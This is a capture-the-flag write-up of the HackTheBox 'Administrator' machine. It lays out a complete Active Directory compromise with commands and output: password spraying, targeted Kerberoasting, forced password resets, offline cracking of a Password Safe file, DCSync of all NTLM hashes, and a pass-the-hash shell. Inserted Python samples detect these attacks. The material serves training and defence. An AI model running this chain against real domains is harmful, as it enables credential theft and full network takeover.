[HackTheBox] Administrator

jamarir

Just another GenericAll / ForceChangePassword / Password Safe 3 / GenericWrite & targeted kerberoast / DCSync Write-up.

As is common in real-life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich

Machine Link.

IppSec Walkthrough.

Foothold

Open ports

The Nmap SYN scan shows our target is the DC (Kerberos, DNS, LDAP, WinRM):

jamarir@kali:~$ sudo nmap -sS -p- -v -Pn --disable-arp-ping -oA syn_full --open 10.10.11.42; 
jamarir@kali:~$ nmap -Pn --disable-arp-ping -sC -sV -v -oA nse 10.10.11.42 -p$(grep -oP '^\d*(?=/)(?=.* open )' syn_full.nmap |sort -u |tr '\n' ',' |grep -oP '.*(?=,)')
[...]
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: <DATE>)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
55167/tcp open  msrpc         Microsoft Windows RPC
61390/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
61401/tcp open  msrpc         Microsoft Windows RPC
61406/tcp open  msrpc         Microsoft Windows RPC
61409/tcp open  msrpc         Microsoft Windows RPC
61428/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

As a DNS server, it becomes our local resolver:

jamarir@kali:~$ sudo sed -i '1i nameserver 10.10.11.42' /etc/resolv.conf

Whose FQDN is DC.administrator.htb:

jamarir@kali:~$ nxc smb 10.10.11.42
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)

Down the rabbit holes

Our Olivia user has no access to any uncommon SMB share on the DC:

jamarir@kali:~$ nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\Olivia:ichliebedich
SMB         10.10.11.42     445    DC               [*] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share

Nor to the FTP service:

jamarir@kali:~$ ftp Olivia@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password:
530 User cannot log in, home directory inaccessible.
ftp: Login failed
ftp> exit
221 Goodbye.

We could also spray the ichliebedich password against all domain users:

jamarir@kali:~$ nxc ldap 10.10.11.42 -u 'Olivia' -p 'ichliebedich' -d 'administrator.htb' --query "(&(objectCategory=person)(objectClass=user))" "sAMAccountName" |grep -oP '.*sAMAccountName:\s*\K.*'
Administrator
Guest
krbtgt
olivia
michael
benjamin
emily
ethan
alexander
emma

But we find no other credentials:

jamarir@kali:~$ nxc smb 10.10.11.42 -u users.txt -p 'ichliebedich' --shares --continue-on-success
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [-] administrator.htb\Administrator:ichliebedich STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\Guest:ichliebedich STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\krbtgt:ichliebedich STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [+] administrator.htb\olivia:ichliebedich
SMB         10.10.11.42     445    DC               [-] administrator.htb\michael:ichliebedich STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\benjamin:ichliebedich STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\emily:ichliebedich STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\ethan:ichliebedich STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\alexander:ichliebedich STATUS_LOGON_FAILURE
SMB         10.10.11.42     445    DC               [-] administrator.htb\emma:ichliebedich STATUS_LOGON_FAILURE

Michael GenericAll’ed

As we have valid credentials over LDAP, we can collect BloodHound data. Let’s use the SharpHound ingestor (also available precompiled in the SharpCollection repo), for a change from a Windows machine:

PS C:\Users\jamarir> SharpHound.exe -d 'administrator.htb' --domaincontroller 10.10.11.42 --ldapusername 'Olivia' --ldappassword 'ichliebedich' -c all --collectallproperties

First, we mark Olivia as Owned and look at her transitive outbound object control:

We find out that Olivia can WinRM (as a member of Remote Management Users). Also, Olivia has GenericAll over MICHAEL, so she may edit any of his properties. Thus, we could either Kerberoast him or change his password.

A targeted Kerberoast (adding an SPN with RSAT, for instance, then roasting it with Rubeus) yields a hash that rockyou doesn’t crack:

PS C:\Users\jamarir> Set-ADUser -Identity 'MICHAEL' -ServicePrincipalNames @{Add='AAA/HACK'} -Verbose -Server 10.10.11.42 -Credential (New-Object System.Management.Automation.PSCredential('administrator.htb\Olivia', (ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force)))
VERBOSE: Performing the operation "Set" on target "CN=Michael Williams,CN=Users,DC=administrator,DC=htb"
PS C:\Users\jamarir> Rubeus.exe kerberoast /nowrap /domain:'administrator.htb' /dc:10.10.11.42 /creduser:'administrator.htb'\'Olivia' /credpassword:'ichliebedich' /user:MICHAEL
[...]
[*] Target User            : MICHAEL
[*] Target Domain          : administrator.htb
[*] Searching path 'LDAP://10.10.11.42/DC=administrator,DC=htb' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=MICHAEL)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : michael
[*] DistinguishedName      : CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] ServicePrincipalName   : AAA/HACK
[*] PwdLastSet             : 06/10/2024 02:33:37
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*michael$administrator.htb$AAA/HACK@administrator.htb[...]
jamarir@kali:~$ echo '$krb5tgs$23$*michael$administrator.htb$AAA/HACK@administrator.htb*$15[...]DF' |john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin

Then, let's change michael's password instead, with net rpc or PowerView's Set-DomainUserPassword:

jamarir@kali:~$ net rpc password 'michael' 'P@ssw0rd123!' -U administrator.htb/'Olivia'%'ichliebedich' -S 'administrator.htb'
PS C:\Users\jamarir> Set-DomainUserPassword -Domain administrator.htb -Identity 'michael' -AccountPassword (ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force) -Server 10.10.11.42 -Credential (New-Object System.Management.Automation.PSCredential('administrator.htb\Olivia',(ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force)))

This user has no access to additional shares:

PS C:\Users\jamarir> nxc smb 10.10.11.42 -u 'michael' -p 'P@ssw0rd123!' --shares
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\michael:P@ssw0rd123!
SMB         10.10.11.42     445    DC               [*] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share

Nonetheless, he can WinRM:

But no interesting files are exposed in his profile folder:

jamarir@kali:~$ evil-winrm -i 10.10.11.42 -u 'michael' -p 'P@ssw0rd123!'
*Evil-WinRM* PS C:\Users\michael\Documents> Get-ChildItem -Path '..' -Recurse -File -Include *.xml,*.txt,*.doc*,*.xls*,*.csv,*.ppt*,*.pdf,*.ini,*cfg,*.conf,*.*sql,*.exe,*.zip,*.tar,*.swp,*.bak,*.bk,*.*sh,*.py,*.log*,*.cgi,*.db,*.yml,*.yaml 2>$null |Select -Expand FullName

Benjamin ForceChangePassword’ed

Michael has ForceChangePassword over Benjamin, so let’s just move on and reset Benjamin's password:

jamarir@kali:~$ rpcclient 10.10.11.42 -U administrator.htb/'michael'%'P@ssw0rd123!' -c 'setuserinfo2 benjamin 23 "P@ssw0rd123!";quit'

Again, this user doesn't have access to more shares :/

jamarir@kali:~$ nxc smb 10.10.11.42 -u 'benjamin' -p 'P@ssw0rd123!' --shares
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\benjamin:P@ssw0rd124!
SMB         10.10.11.42     445    DC               [*] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share

But as shown in the above BloodHound output, this user is a member of the non-default group Share Moderators.

We may retrieve the potentially non-default groups (those whose RID is greater than or equal to 1000) using the following Neo4j Cypher query:

// RID >= 1000: a leading digit 1-9 followed by at least three more digits (the form "-1\d{3,}$" would miss RIDs such as 3601)
MATCH (g:Group) WHERE g.objectid =~ ".*-[1-9]\d{3,}$" return g

Note that the DnsUpdateProxy, DnsAdmins, and WinRMRemoteWMIUsers_ groups may have an RID above 1000, but still remain default groups, as their RID is “variable”:

We could even get any non-default domain user or object using the following Cypher queries, respectively:

// Same RID >= 1000 pattern as above, applied to users and then to every object
MATCH (u:User) WHERE u.objectid =~ ".*-[1-9]\d{3,}$" return u
MATCH (o) WHERE o.objectid =~ ".*-[1-9]\d{3,}$" return o

Custom BloodHound queries may be edited in ~/.config/bloodhound/customqueries.json on Linux, and in AppData\Roaming\BloodHound\customqueries.json on Windows.

psafe3 hashcat’ed

It seems that the Share Moderators group allows its members to access the FTP service, as Benjamin can list its content!

jamarir@kali:~$ ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -a
229 Entering Extended Passive Mode (|||55057|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp>

The FTP server contains a Password Safe (psafe3) file, i.e. a password manager database like those of KeePass or 1Password. This file is definitely interesting, as it may contain other credentials for later impersonation. Such a psafe3 file can be cracked with hashcat mode 5200 (found by browsing the hash-mode list with fzf):

jamarir@kali:~$ git clone --depth 1 https://github.com/junegunn/fzf.git ~/.fzf && ~/.fzf/install
jamarir@kali:~$ hashcat -h |sed -n '/^.*Hash modes.*$/,/^.*Brain Client Features.*$/p' |fzf

jamarir@kali:~$ hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
[...]
Backup.psafe3:tekieromucho

Session..........: hashcat
Status...........: Cracked
[...]

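To show why a stolen .psafe3 backup can be attacked offline and what the ITER field buys the defender, here is an added example (not the page's code, nor Password Safe's or hashcat's): it parses the fixed V3 header (TAG, SALT, ITER, H(P')), recomputes the stretched key exactly as hashcat mode 5200 does per candidate, and reports whether the iteration count is adequate. The sample header is constructed in the script, and the 100,000 audit threshold is an assumption, not part of the format spec.

```python
from __future__ import annotations
import hashlib
import os
import struct

PWS3_TAG = b"PWS3"
SPEC_MIN_ITER = 2048       # floor required by the Password Safe V3 format
AUDIT_MIN_ITER = 100_000   # assumed audit threshold for this check, not from the spec


def stretch_key(password: bytes, salt: bytes, iterations: int) -> bytes:
    """P' = StretchKey(P, SALT, ITER): X0 = SHA256(P || SALT), Xi = SHA256(X(i-1)), P' = X_ITER."""
    x = hashlib.sha256(password + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def parse_header(blob: bytes) -> tuple[bytes, int, bytes]:
    """Split the fixed start of a V3 file: TAG(4) | SALT(32) | ITER(4, little-endian) | H(P')(32)."""
    if len(blob) < 72 or blob[:4] != PWS3_TAG:
        raise ValueError("not a Password Safe V3 file")
    salt = blob[4:36]
    (iterations,) = struct.unpack("<I", blob[36:40])
    return salt, iterations, blob[40:72]


def check_password(blob: bytes, candidate: str) -> bool:
    """The per-candidate test hashcat mode 5200 performs: SHA256(P') == H(P') from the header."""
    salt, iterations, h_p_prime = parse_header(blob)
    p_prime = stretch_key(candidate.encode("utf-8"), salt, iterations)
    return hashlib.sha256(p_prime).digest() == h_p_prime


def audit_iterations(blob: bytes) -> dict:
    """How much work one offline guess costs, and whether the file's ITER is acceptable."""
    _, iterations, _ = parse_header(blob)
    return {
        "iterations": iterations,
        "sha256_per_guess": iterations + 2,   # the stretch loop, plus X0 and the final H(P')
        "meets_spec_minimum": iterations >= SPEC_MIN_ITER,
        "meets_audit_minimum": iterations >= AUDIT_MIN_ITER,
    }


def make_sample_header(password: str, iterations: int, salt: bytes | None = None) -> bytes:
    """Constructed sample header for demonstration (not the box's Backup.psafe3)."""
    salt = salt if salt is not None else os.urandom(32)
    p_prime = stretch_key(password.encode("utf-8"), salt, iterations)
    return PWS3_TAG + salt + struct.pack("<I", iterations) + hashlib.sha256(p_prime).digest()


# Sample at the spec minimum: cheap enough that a full rockyou run finishes quickly.
SAMPLE = make_sample_header("tekieromucho", SPEC_MIN_ITER, salt=b"\x01" * 32)

if __name__ == "__main__":
    print(audit_iterations(SAMPLE), check_password(SAMPLE, "tekieromucho"))
```

A backup created with a high ITER does not stop the attack, it only multiplies the SHA-256 work per guess; keeping the backup off a share readable by a low-privilege group is what actually removes it.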
Spraying the tekieromucho password gives no result:

jamarir@kali:~$ nxc smb 10.10.11.42 -u users.txt -p 'tekieromucho' |grep -v 'STATUS_LOGON_FAILURE'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)

But we can open it with the pwsafe tool:

And add the password column:

To reveal the different credentials:

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

Privilege escalation

Emily Flag’ed

We finally get the user flag as Emily!

jamarir@kali:~$ evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
*Evil-WinRM* PS C:\Users\emily\Documents> gc ../desktop/user.txt
9f[...]c4

Ethan GenericWrite’ed

In BloodHound, we see emily can edit any attribute of the ethan user via a GenericWrite ACE:

And ethan can DCSync:

Ethan ShadowCredentials’ed (rabbit hole)

As BloodHound suggests, we could perform a Shadow Credentials attack. Let's use pywhisker for that:

  • First we list the existing keys (for later restoration), then add our own:
jamarir@kali:~$ pywhisker -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target "ethan" --action "list"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
jamarir@kali:~$ pywhisker -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target "ethan" --action "add" --filename test1
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 2534373f-1e0f-47e6-810f-f60aa9cf95e6
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: test1.pfx
[*] Must be used with password: oXlLDJOUeSzLADBT7kz7
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
  • And request a TGT for ethan using PKINITtools. However, PKINIT authentication isn’t supported by the DC:
jamarir@kali:~$ python3 gits/PKINITtools/gettgtpkinit.py -cert-pfx test1.pfx -pfx-pass 'oXlLDJOUeSzLADBT7kz7' administrator.htb/ethan ethan.ccache
<DATE> minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
<DATE> minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/home/jamarir/gits/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/jamarir/gits/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/jamarir/gits/PKINITtools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
          ^^^^^^^^^^^^^^^^^^
  File "/home/jamarir/.venv/lib/python3.12/site-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
    raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError:  Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"

Indeed, no CA (Certificate Authority) is available in the domain:

jamarir@kali:~$ nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' -M enum_ca
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\Olivia:ichliebedich

Ethan TargetedKerberoast’ed

Then, let’s resort to targeted Kerberoasting, using the targetedKerberoast tool for instance:

Since targetedKerberoast requests a TGS under the hood:

jamarir@kali:~$ targetedKerberoast.py -h
[...]
  --request-user username
                        Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
[...]

We’ll need to synchronize our time with the DC (through the NTP service) to avoid KRB_AP_ERR_SKEW errors:

jamarir@kali:~$ sudo timedatectl set-ntp 0; sudo rdate -n 10.10.11.42
jamarir@kali:~$ python targetedKerberoast.py -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --request-user 'ethan' --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Attacking user (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fcb9f13ed6e0c0f034b6cefb5d4d87ff$[...]

Ethan's TGS can be cracked using john:

jamarir@kali:~$ echo '$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fc[...]75' |john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin 
[...]
limpbizkit       (?)
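
Both Kerberoasts on this box (MICHAEL's SPN earlier, ethan's here) leave the same two-event trail on the DC: a 5136 write of servicePrincipalName on a user object, followed by a 4769 service ticket request with RC4 (etype 0x17) for that account. The following added detection example (not from the page, nor from targetedKerberoast) correlates the two over constructed sample events; the DN-to-sAMAccountName map and a SACL that audits writes on user objects are assumptions.

```python
from __future__ import annotations
from datetime import datetime, timedelta

RC4_HMAC = "0x17"             # etype 23: the $krb5tgs$23$ hashes john/hashcat crack fastest
SPN_VALUE_ADDED = "%%14674"   # 5136 OperationType meaning "value added"

# Constructed sample Security-log events (not real log data); only the fields used are kept.
SAMPLE_EVENTS = [
    {"EventID": 5136, "Time": "2024-10-06 02:40:10", "SubjectUserName": "Olivia",
     "ObjectDN": "CN=Michael Williams,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "AAA/HACK",
     "OperationType": SPN_VALUE_ADDED},
    {"EventID": 4769, "Time": "2024-10-06 02:41:05", "TargetUserName": "Olivia@ADMINISTRATOR.HTB",
     "ServiceName": "michael", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 4769, "Time": "2024-10-06 02:41:20", "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12"},   # AES, machine account: normal
    {"EventID": 4769, "Time": "2024-10-06 02:42:00", "TargetUserName": "michael@ADMINISTRATOR.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
]

# Assumption: the DN logged in 5136 is resolved to a sAMAccountName out of band (e.g. via LDAP).
DN_TO_SAM = {"CN=Michael Williams,CN=Users,DC=administrator,DC=htb": "michael"}


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def spn_additions(events: list[dict]) -> list[tuple[datetime, str, str, str]]:
    """(time, writer, target account, spn) for every SPN value added to a known user object."""
    hits = []
    for e in events:
        if (e.get("EventID") == 5136
                and e.get("AttributeLDAPDisplayName") == "servicePrincipalName"
                and e.get("OperationType") == SPN_VALUE_ADDED):
            target = DN_TO_SAM.get(e["ObjectDN"])
            if target:
                hits.append((_ts(e["Time"]), e["SubjectUserName"].lower(), target, e["AttributeValue"]))
    return hits


def detect_targeted_kerberoast(events: list[dict], window: timedelta = timedelta(hours=1)) -> list[dict]:
    """Flag RC4 TGS requests for a user account whose SPN was written shortly before."""
    writes = spn_additions(events)
    alerts = []
    for e in events:
        if e.get("EventID") != 4769 or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        service = e["ServiceName"].lower()
        if service.endswith("$") or service == "krbtgt":
            continue   # machine accounts and krbtgt are not the targeted-Kerberoast pattern
        requester = e["TargetUserName"].split("@")[0].lower()
        when = _ts(e["Time"])
        for wtime, writer, target, spn in writes:
            if target == service and timedelta(0) <= when - wtime <= window:
                alerts.append({
                    "service_account": service, "spn": spn, "spn_added_by": writer,
                    "tgs_requested_by": requester,
                    "seconds_after_spn_write": int((when - wtime).total_seconds()),
                    "same_principal": writer == requester,   # one account added the SPN and roasted it
                })
    return alerts
```

The page's own Rubeus output also shows the weakness that makes the cracking feasible: "Supported ETypes: RC4_HMAC_DEFAULT", which is what the 0x17 filter keys on; accounts restricted to AES via msDS-SupportedEncryptionTypes would not produce such tickets.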

Allowing us to DCSync!

jamarir@kali:~$ secretsdump.py 'administrator.htb/ethan:limpbizkit'@10.10.11.42
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
[*] Cleaning up...

The domain administrator’s NTHash is 3dc553ce4b9fd20bd016e098d2d2fd2e. GG WP!

jamarir@kali:~$ psexec.py -hashes ':3dc553ce4b9fd20bd016e098d2d2fd2e' 'Administrator'@10.10.11.42
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
8d[...]54
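
The DCSync above pulls secrets through the DRSUAPI replication rights, which a DC records as event 4662 carrying the DS-Replication-Get-Changes control-access GUIDs in its Properties field. As an added example (not from the page, nor from Impacket), this flags such 4662 events whose subject is neither a domain controller nor a known directory-sync account; the events are constructed and the allowlist is an assumption.

```python
from __future__ import annotations
import re

# Control-access right GUIDs a DCSync needs; they appear in the Properties field of event 4662.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Assumptions: which principals legitimately replicate (DCs, directory-sync service accounts).
DOMAIN_CONTROLLERS = {"dc$"}
SYNC_ALLOWLIST = {"svc_dirsync"}   # hypothetical placeholder, not an account from the box

# Constructed 4662 events (not real log data); Properties is the raw multi-line field.
SAMPLE_4662 = [
    {"SubjectUserName": "DC$", "SubjectDomainName": "ADMINISTRATOR", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "ethan", "SubjectDomainName": "ADMINISTRATOR", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A different control-access right (User-Force-Change-Password): not a replication event.
    {"SubjectUserName": "michael", "SubjectDomainName": "ADMINISTRATOR", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{00299570-246d-11d0-a768-00aa006e0529}"},
]


def replication_rights(properties: str) -> list[str]:
    """Names of the replication control-access rights present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events: list[dict]) -> list[dict]:
    """Flag replication-right use by anything that is not a DC or an allowlisted sync account."""
    alerts = []
    for e in events:
        rights = replication_rights(e.get("Properties", ""))
        if not rights:
            continue
        subject = e["SubjectUserName"].lower()
        if subject in DOMAIN_CONTROLLERS or subject in SYNC_ALLOWLIST:
            continue
        full_dump = "DS-Replication-Get-Changes-All" in rights   # the right needed to read secrets
        alerts.append({
            "subject": f"{e.get('SubjectDomainName', '')}\\{e['SubjectUserName']}",
            "rights": rights,
            "severity": "high" if full_dump else "medium",
            "machine_account": subject.endswith("$"),   # a non-DC computer account is still suspicious
        })
    return alerts
```

On this box the alert would name ethan, a plain user account that should never hold these rights; the fix is to remove them from the domain object's ACL and audit who can grant them (the GenericWrite and GenericAll edges BloodHound showed).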

Written by jamarir: Pentester, CTF Player, Game Modding Enthusiast | CRTO